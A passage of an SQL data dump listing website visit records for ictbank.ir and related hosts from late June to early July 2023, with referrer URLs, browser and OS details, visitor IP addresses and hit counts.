(35067,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.2','000',0,8,0),
(35068,'2023-06-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.0.229.102','000',0,1,0),
(35069,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(35070,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35071,'2023-06-29','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','49.236.200.213','000',0,1,0),
(35072,'2023-06-29','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(35073,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.9.238.21','000',0,4,0),
(35074,'2023-06-29','https://www.google.com/','Chrome','Linux','114.0.0.0','desktop','Unknown','','83.219.61.42','000',0,1,0),
(35075,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35076,'2023-06-29','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.73','000',0,1,0),
(35077,'2023-06-29','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.65','000',0,1,0),
(35078,'2023-06-29','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.69','000',0,1,0),
(35079,'2023-06-29','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.71','000',0,1,0),
(35080,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.195.5','000',0,3,0),
(35081,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.195.11','000',0,2,0),
(35082,'2023-06-29','https://ftp.design-arena.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.192.4','000',0,2,0),
(35083,'2023-06-29','https://ftp.design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.195.8','000',0,2,0),
(35084,'2023-06-29','https://ftp.design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.192.6','000',0,1,0),
(35085,'2023-06-29','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','65.32.199.196','000',0,1,0),
(35086,'2023-06-29','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','185.92.194.80','000',0,1,0),
(35087,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.49','000',0,1,0),
(35088,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.10','000',0,1,0),
(35089,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.41','000',0,1,0),
(35090,'2023-06-29','https://webmail.design-arena.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.9','000',0,3,0),
(35091,'2023-06-29','https://webmail.design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.4','000',0,1,0),
(35092,'2023-06-29','https://webmail.design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.42','000',0,2,0),
(35093,'2023-06-29','https://webmail.design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.6','000',0,1,0),
(35094,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35095,'2023-06-29','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,2,0),
(35096,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','104.28.194.222','000',0,1,0),
(35097,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','104.28.226.220','000',0,1,0),
(35098,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.33','000',0,1,0),
(35099,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.5','000',0,1,0),
(35100,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.49','000',0,1,0),
(35101,'2023-06-29','https://ictbank.ir/blog','Chrome','Android','114.0.0.0','mobile:smart','Nexus 5X','','74.125.210.68','000',0,1,0),
(35102,'2023-06-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(35103,'2023-06-29','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,4,0),
(35104,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.2','000',0,1,0),
(35105,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(35106,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.32','000',0,2,0),
(35107,'2023-06-30','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(35108,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(35109,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(35110,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35111,'2023-06-30','https://ictbank.ir/blog','Kazehakase','Fedora','0.0.0','desktop','Unknown','','1.202.112.79','000',0,1,0),
(35112,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','219.143.174.51','000',0,1,0),
(35113,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','92.205.64.149','000',0,3,0),
(35114,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(35115,'2023-06-30','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35116,'2023-06-30','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.251.89.164','000',0,1,0),
(35117,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.7','000',0,1,0),
(35118,'2023-06-30','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.244','000',0,1,0),
(35119,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(35120,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','47.180.135.197','000',0,28,0),
(35121,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35122,'2023-06-30','https://ictbank.ir/blog','Firefox','Windows','76.0','desktop','Unknown','','83.166.242.10','000',0,2,0),
(35123,'2023-06-30','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(35124,'2023-06-30','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','103.93.160.210','000',0,1,0),
(35125,'2023-06-30','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.42','000',0,2,0),
(35126,'2023-06-30','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(35127,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(35128,'2023-06-30','https://45.92.94.221:443/blog','Chrome','OS X','54.0.0.0','desktop','Macintosh','','104.140.148.78','000',0,2,0),
(35129,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','148.72.232.50','000',0,1,0),
(35130,'2023-06-30','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(35131,'2023-06-30','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','51.222.44.188','000',0,1,0),
(35132,'2023-06-30','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.158.11','000',0,2,0),
(35133,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','150.255.176.91','000',0,1,0),
(35134,'2023-06-30','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','37.59.53.82','000',0,1,0),
(35135,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(35136,'2023-06-30','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,8,0),
(35137,'2023-06-30','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','45.80.181.116','000',0,1,0),
(35138,'2023-06-30','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','94.130.167.248','000',0,1,0),
(35139,'2023-06-30','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','92.204.139.118','000',0,1,0),
(35140,'2023-06-30','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.87.97','000',0,1,0),
(35141,'2023-06-30','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.86.63','000',0,1,0),
(35142,'2023-06-30','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.74.59','000',0,1,0),
(35143,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','63.142.255.209','000',0,3,0),
(35144,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,4,0),
(35145,'2023-06-30','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(35146,'2023-06-30','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(35147,'2023-06-30','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(35148,'2023-06-30','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(35149,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(35150,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(35151,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.51','000',0,1,0),
(35152,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.246.188.74','000',0,3,0),
(35153,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','162.247.73.192','000',0,6,0),
(35154,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.56.83.83','000',0,1,0),
(35155,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.54','000',0,1,0),
(35156,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.128.248.29','000',0,1,0),
(35157,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.33','000',0,3,0),
(35158,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','2.58.56.37','000',0,1,0),
(35159,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','166.70.207.2','000',0,2,0),
(35160,'2023-06-30','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.53','000',0,2,0),
(35161,'2023-06-30','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','74.249.26.142','000',0,1,0),
(35162,'2023-06-30','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(35163,'2023-06-30','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(35164,'2023-06-30','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(35165,'2023-06-30','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(35166,'2023-07-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.49','000',0,2,0),
(35167,'2023-07-01','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,5,0),
(35168,'2023-07-01','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,4,0),
(35169,'2023-07-01','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','92.118.39.83','000',0,2,0),
(35170,'2023-07-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35171,'2023-07-01','https://ictbank.ir/blog','Chrome','OS X','114.0.0.0','desktop','Macintosh','','212.102.57.206','000',0,1,0),
(35172,'2023-07-01','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.31.216','000',0,2,0),
(35173,'2023-07-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','167.235.183.230','000',0,1,0),
(35174,'2023-07-01','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.35','000',0,2,0),
(35175,'2023-07-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35176,'2023-07-01','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','208.109.41.235','000',0,1,0),
(35177,'2023-07-01','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','165.232.78.206','000',0,1,0),
(35178,'2023-07-01','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','207.90.244.10','000',0,2,0),
(35179,'2023-07-01','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,2,0),
(35180,'2023-07-01','https://ictbank.ir/blog','Chrome','OS X','114.0.0.0','desktop','Macintosh','','5.160.29.66','000',0,3,0),
(35181,'2023-07-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,22,0),
(35182,'2023-07-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(35183,'2023-07-01','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(35184,'2023-07-01','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.86.63','000',0,1,0),
(35185,'2023-07-01','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.93.234','000',0,2,0),
(35186,'2023-07-01','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.28','000',0,1,0),
(35187,'2023-07-01','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.239','000',0,1,0),
(35188,'2023-07-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','154.16.200.150','000',0,1,0),
(35189,'2023-07-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35190,'2023-07-01','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(35191,'2023-07-01','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,2,0),
(35192,'2023-07-01','https://ictbank.ir/sites/nikanai/aboutus/','Edge','Windows','114.0.0.0','desktop','Unknown','','65.109.210.126','000',0,2,0),
(35193,'2023-07-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(35194,'2023-07-01','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.136.137','000',0,5,0),
(35195,'2023-07-01','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.147.186','000',0,33,0),
(35196,'2023-07-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(35197,'2023-07-01','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,6,0),
(35198,'2023-07-01','https://ictbank.ir/blog','Chrome','OS X','71.0.0.0','desktop','Macintosh','','46.105.245.166','000',0,1,0),
(35199,'2023-07-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','217.116.232.216','000',0,1,0),
(35200,'2023-07-01','http://ictbank.ir','Firefox','Windows','32.0','desktop','Unknown','','185.220.101.54','000',0,1,0),
(35201,'2023-07-01','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,1,0),
(35202,'2023-07-01','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.200.73.7','000',0,1,0),
(35203,'2023-07-01','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35204,'2023-07-01','https://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','171.13.14.83','000',0,1,0),
(35205,'2023-07-01','https://ictbank.ir/blog','Chrome','Android','106.0.0.0','mobile:smart','Nexus 5','','171.13.14.46','000',0,1,0),
(35206,'2023-07-01','https://ictbank.ir/blog','Chrome','Android','106.0.0.0','mobile:smart','Nexus 5','','171.13.14.84','000',0,1,0),
(35207,'2023-07-01','https://45.92.94.221:443/blog','Chrome','Linux','86.0.0','desktop','Unknown','','118.123.105.86','000',0,6,0),
(35208,'2023-07-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,2,0),
(35209,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(35210,'2023-07-02','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,18,0),
(35211,'2023-07-02','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35212,'2023-07-02','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','77.237.85.2','000',0,1,0),
(35213,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,1,0),
(35214,'2023-07-02','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(35215,'2023-07-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(35216,'2023-07-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.68.11.211','000',0,1,0),
(35217,'2023-07-02','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','151.234.192.156','000',0,201,0),
(35218,'2023-07-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(35219,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','65.109.210.126','000',0,3,0),
(35220,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(35221,'2023-07-02','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(35222,'2023-07-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35223,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,3,0),
(35224,'2023-07-02','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(35225,'2023-07-02','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','94.183.31.125','000',0,2,0),
(35226,'2023-07-02','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(35227,'2023-07-02','https://ictbank.ir/blog','Chrome','Windows','40.0.0.0','desktop','Unknown','','62.210.185.4','000',0,13,0),
(35228,'2023-07-02','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','47.241.237.64','000',0,1,0),
(35229,'2023-07-02','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','162.240.52.12','000',0,1,0),
(35230,'2023-07-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','45.79.15.116','000',0,1,0),
(35231,'2023-07-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.138.16.149','000',0,1,0),
(35232,'2023-07-02','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(35233,'2023-07-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','136.243.54.123','000',0,1,0),
(35234,'2023-07-02','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.239.150.56','000',0,1,0),
(35235,'2023-07-02','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','2.57.122.71','000',0,2,0),
(35236,'2023-07-02','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,3,0),
(35237,'2023-07-02','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','169.197.113.225','000',0,3,0),
(35238,'2023-07-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35239,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(35240,'2023-07-03','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(35241,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','2.58.15.225','000',0,55,0),
(35242,'2023-07-03','https://ictbank.ir/blog','Firefox','Windows','3.0','desktop','Unknown','','175.6.40.66','000',0,3,0),
(35243,'2023-07-03','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35244,'2023-07-03','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35245,'2023-07-03','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','194.90.114.33','000',0,2,0),
(35246,'2023-07-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.5','000',0,3,0),
(35247,'2023-07-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.165.56.17','000',0,1,0),
(35248,'2023-07-03','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','62.141.44.236','000',0,1,0),
(35249,'2023-07-03','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','42.243.117.18','000',0,1,0),
(35250,'2023-07-03','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(35251,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','185.233.37.155','000',0,1,0),
(35252,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','207.90.244.10','000',0,2,0),
(35253,'2023-07-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35254,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','159.89.235.72','000',0,1,0),
(35255,'2023-07-03','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(35256,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','172.96.85.65','000',0,1,0),
(35257,'2023-07-03','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(35258,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','138.229.104.24','000',0,2,0),
(35259,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','68.234.46.143','000',0,2,0),
(35260,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','168.91.9.69','000',0,2,0),
(35261,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.171.91.18','000',0,2,0),
(35262,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','167.160.73.72','000',0,2,0),
(35263,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','162.244.148.1','000',0,2,0),
(35264,'2023-07-03','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','151.238.16.250','000',0,118,0),
(35265,'2023-07-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.104.181.160','000',0,1,0),
(35266,'2023-07-03','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(35267,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','207.180.219.234','000',0,1,0),
(35268,'2023-07-03','https://ictbank.ir/blog','Firefox','Linux','112.0','desktop','Unknown','','172.104.243.93','000',0,1,0),
(35269,'2023-07-03','https://ictbank.ir/blog','Firefox','Linux','112.0','desktop','Unknown','','192.46.234.95','000',0,1,0),
(35270,'2023-07-03','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','93.114.235.167','000',0,1,0),
(35271,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','67.205.172.101','000',0,1,0),
(35272,'2023-07-03','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(35273,'2023-07-03','https://design-arena.ir/blog','Galeon','Ubuntu','2.0.0','desktop','Unknown','','45.76.43.3','000',0,3,0),
(35274,'2023-07-03','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.145.159','000',0,38,0),
(35275,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','23.254.204.229','000',0,1,0),
(35276,'2023-07-03','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','167.99.54.31','000',0,1,0),
(35277,'2023-07-03','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','95.214.27.159','000',0,1,0),
(35278,'2023-07-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(35279,'2023-07-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,2,0),
(35280,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','195.49.212.165','000',0,1,0),
(35281,'2023-07-03','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','14.63.221.211','000',0,1,0),
(35282,'2023-07-03','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','192.36.109.128','000',0,1,0),
(35283,'2023-07-03','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','192.36.109.96','000',0,1,0),
(35284,'2023-07-03','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','192.36.109.75','000',0,1,0),
(35285,'2023-07-03','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','192.36.109.132','000',0,1,0),
(35286,'2023-07-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','72.167.51.121','000',0,1,0),
